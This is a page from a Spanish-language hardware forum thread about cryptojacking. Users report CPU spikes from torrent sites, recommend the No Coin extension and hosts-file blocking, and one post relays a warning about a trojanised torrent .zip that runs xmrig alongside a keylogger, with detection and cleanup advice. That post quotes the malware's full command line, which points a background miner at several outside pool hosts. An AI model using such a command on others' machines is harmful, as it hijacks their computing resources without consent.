Página 5 de 5 PrimerPrimer 12345
Resultados 41 al 46 de 46

Tema: Última Moda: Sitios WEB que MINAN a nuestra costa

  1. #41
    Master
    Ubicación
    En la capital del Jerte....
    Mensajes
    1,289

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Bueno, yo comento mi prueba recién realizada.
    Acabo de acceder a una página de torrents, y se me ha puesto el proce al 100% en cosa de milésimas de segundos. Madre mía, que crujida!!!!
    Supongo que ésto a la larga afectará a la "vida" del procesador, ¿no? Así que si lo hacen sin mi permiso, me parece un robo a mano armada, y encima te jod** el equipo.
    Salu222
    .... Para algunos, la vida es galopar un camino empedrado de horas minutos y segundos.
    Yo, más humilde soy, y sólo quiero que la ola que surge del último suspiro de un segundo
    me transporte mecido hasta el siguiente....

  2. #42

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Cita Iniciado por soyungamba Ver mensaje
    Bueno, yo comento mi prueba recién realizada.
    Acabo de acceder a una página de torrents, y se me ha puesto el proce al 100% en cosa de milésimas de segundos. Madre mía, que crujida!!!!
    Supongo que ésto a la larga afectará a la "vida" del procesador, ¿no? Así que si lo hacen sin mi permiso, me parece un robo a mano armada, y encima te jod** el equipo.
    Salu222
    No creo que te lo vaya a jod..........

    Pero bueno, que esto pasa en muchos SO. En Android hace medio año o así se descubrió un malware Loapi que te crujía la batería llegando incluso a deformarte la carcasa que le tuvieras puesta al móvil, del calor que conseguía generar, o incluso reventar la batería

    No creo que llegues a eso con los miners pero es lo que está de moda y hay que tener cuidado.

    Un saludo.

  3. #43

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Yo uso el plugin "No Coin" en el navegador Chrome y ya no pueden minar si no le doy permiso, te recomiendo que lo uses (creo que hay versión para Firefox).

    Un saludo.
    Motherboard: MSI Gaming z97 3 | RAM: G.Skill RipsjawX 4x4 GB @ 2133 MHz CL9 [1.53v] | CPU: Intel Core i7 4790k @ 4.4 GHz [v1.18] + Noctua NH-D14 | GPU: EVGA SSC ACX 2.0 GTX 970| SSD: Crucial MX100 256 GB | HDD:
    Seagate 500 GB + Hitachi 500 GB + WD Green 500 GB| PSU: Corsair RM750i | Caja: NZXT Phantom ATAUD Edition | SO: Win10 x64 | Keyboard: Motospeed CK104 | Mouse: Logitech G502 | Monitor: Samsung UE32F5000 + Sony Bravia 37"


  4. #44
    Avatar de Tuelas
    Ubicación
    Barcelona
    Edad
    34
    Mensajes
    6,924

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Cita Iniciado por AdrianSC Ver mensaje
    Yo uso el plugin "No Coin" en el navegador Chrome y ya no pueden minar si no le doy permiso, te recomiendo que lo uses (creo que hay versión para Firefox).

    Un saludo.
    Como bien comentas compañero, No Coin existe también para Firefox y Opera, y van muy bien. También sí se tiene algo de conocimiento y noción, se puede modificar el archivo Host de Windows oculto, añadiendo ciertas lineas de dirección de X portales y paginas para que no puedan minar de ningún modo en nuestro sistema (Recomiendo c.seguridad), aunque lo más cómodo es usar complementos como el descrito y similares con buenas referencias y actualización constante de nuevas y posibles variantes.


    Un saludo

  5. #45

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Cita Iniciado por soyungamba Ver mensaje
    Bueno, yo comento mi prueba recién realizada.
    Acabo de acceder a una página de torrents, y se me ha puesto el proce al 100% en cosa de milésimas de segundos. Madre mía, que crujida!!!!
    Supongo que ésto a la larga afectará a la "vida" del procesador, ¿no? Así que si lo hacen sin mi permiso, me parece un robo a mano armada, y encima te jod** el equipo.
    Salu222
    Si tuvieras algún problema de temperaturas si que podría ser un problema pero sino los procesadores están hechos para trabajar a alta demanda.

    Esto del minado se puede ver de 2 maneras:

    1.- Quito la publicidad pero utilizo tu CPU para sacar rentabilidad y lógicamente aviso al usuario, desconozco si hay algún caso que haga esto.
    2.- Malware en toda regla que no avisa de lo que está haciendo y muchos usuarios ni se enteran de que está generando beneficios a su costa.

  6. #46
    Master Avatar de COROCOTTA
    Ubicación
    pelin lejos
    Mensajes
    2,240

    Predeterminado Re: Última Moda: Sitios WEB que MINAN a nuestra costa

    Bueno pues esto me he econtrado en Forocoches, yo no soy muy entendido en la materia pero esto parece bastante real.


    Cita Iniciado por BraguetaInkieta Ver mensaje
    Si alguien quiere publicar en meneame o cualquier otro sitio para darle difusión, sentiros libres de ello.



    Buenas a todos.

    Aviso para navegantes. Mejor torrent troyaniza tu máquina para usar tu microprocesador para minar bitcoins. Y no hablo de scripts de minado para webs que puedas bloquear con noscript o NoCoin.

    Normalmente los ficheros que te bajas son nombre_película.torrent, pues bien , ahora han metido ficheros con extensión .zip ( no sé si otras, sólo he visto esta de momento ) y va con un malware que en mi caso ha sido este

    https://github.com/xmrig/xmrig

    Se llama xmrig y sirve para minar bitcoins.

    Está relativamente bien diseñado, te ocupa el 100 % de la cpu minando ralentizando tu pc, y cuando abres el administrador de tareas ( Taskmgr.exe ) y el malware ve que esto está corriendo, libera CPU hasta dejarla en niveles normales.

    Yo me dí cuenta por un contador de rendimiento que tengo externo, si no como digo te vuelves loco.

    Directamente formatee , pero realicé estudios del malware antes.

    Apunta contra varios DNS y se lanza de la siguiente manera, utilizando Visual Basic:

    vbc.exe -o stratum+tcp://akamai.la:3335 -o stratum+tcp://a40-77-229-13.deploy.static.akamaitechnologies.pw:3335 -o stratum+tcp://obviuslyu.duckdns.org:3335 -o stratum+tcp://minecraftsvr.craftx.biz:3335 -o stratum+tcp://185.185.26.117:3335 -k --donate=1 --background --cpu-priority=0 --no-huge-pages --log-file="C:\Users\Quique\AppData\Roaming\3a9e8b5a31e1 583ec40127043fbe8cf7\miner\hash.txt" --print-time=2


    También tiene funciones como las de keylogger ( hijos de puta ) así que ha podido pillar contraseñas.

    Si a alguno le va mal el pc, revisad bien vuestros procesos y fijaos con especial atención en los VBC.exe , si le dais a propiedades veréis desde dónde está corriendo ( el path ) y si tiráis un poco más del hilo veréis los logs de ejecución, los dns contra los que apunta, los logs de keyloger...

    He investigado un poco la web y tiene sede en Ucrania. Esto debería ser denunciable ( a los GC del foro... ).

    He eliminado el malware de mi máquina, pero dejo una captura de virus total donde subo el zip, en este caso la película era Los Elegidos, pero puede ser cualquier peli con extensión .zip .

    Si alguno baja este mismo fichero en https://www.virustotal.com te lo analizan cerca de 60 antivirus, estaría bien que pongáis el hash para saber cuántas muestras de malware tienen. ( si usan más de un virus) Aunque el nombre de fichero sea diferente, el hash no cambia.





    ¿Cómo puedes saber si estás afectado?

    Se sabe que Mejor torrent está usando este tipo de malware, pero no hay que descartar otras fuentes ( emule, archivos de mega...) Para saber si estás afectado, es recomendable mirar el uso de CPU con algo externo a Microsoft, ya que cuando este tipo de malware ve que el administrador de tareas ( Taskmgr.exe ) está corriendo libera el uso de CPU para evitar ser detectado.

    Hay muchos y variados, un shur ha dado esta opción ( Gracias ) , yo en su día usé otro.









    Un shurmano ha subido una muestra del malware, no la he revisado porque estoy en el trabajo, pero confío que hablamos de lo mismo. Gracias [MENTION=33311]---Blaster---[/MENTION]. Lo dejo en spoiler.

    TENED EN CUENTA QUE ES UN VIRUS. Es para aquél que tenga conocimientos y quiera echar un ojo, si no ni toquéis.



    SOLUCIÓN

    Por cortesía de [MENTION=574454]shur152[/MENTION] ( Gracias :mola: ), como él bien dice y yo remarco no esta completo del todo, porque el virus modifica algunas cosas , insisto en que lo mejor es formatear, pero si alguien va con prisas y tiene que esperar al finde o a un rato libre, puede tirar de esto.





    Buenas, está teniendo acogida y me estoy volviendo loco con las citas. Voy a pasar a poner aquí una solución, lo que considero la ÚNICA SOLUCIÓN.

    Hay foreros que comentan que un noscript o un nocoin es suficiente y esto NO ES ASÍ. Estas extensiones de navegador sirven para evitar la ejecución de código no deseado como puede ser coinhive.min.js.

    También comentan de usar PiHole, una herramienta que actúa de proxy "baneando" de tu navegación todas aquellas urls que son suceptibles de ser de anunciantes. Básicamente te capa la publicidad a nivel de red y no de aplicación ( como ABP)

    El problema aquí no es un script en un navegador, es que han infectado los equipos con malware. Tu máquina está infectada, y sólo con arrancar el sistema operativo arrancará XMRIG o sucedáneos.

    Hay shurs que dicen de inhabilitar el proceso, quitarlo del arranque, etc... con todos mis respetos a sus respuestas y conocimientos,creo que esto NO ES SOLUCIÓN.

    Si está bien implementado ha podido lanzar mil cosas por detrás que no nos demos cuenta ( como el key logger que no tiene por qué ir en el mismo proceso ) y quitaríamos un fallo, pero tal vez siguiese ejecutándose mierda en nuestros equipos.

    La única solución fiable es FORMATEAR, con Windows 10 se hace prácticamente solo, no es como el XP de hace años.

    Salvad sólo fotos y documentos. Pensad que la música , las películas , el porno y todo eso que tengáis bajado de internet podréis volver a bajarlo el día de mañana.
    3770K
    NOCTUA NH-U12P
    Samsung EVO 512GB
    SONATA PLUS 550@NOCTUA NF-S12


Página 5 de 5 PrimerPrimer 12345

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •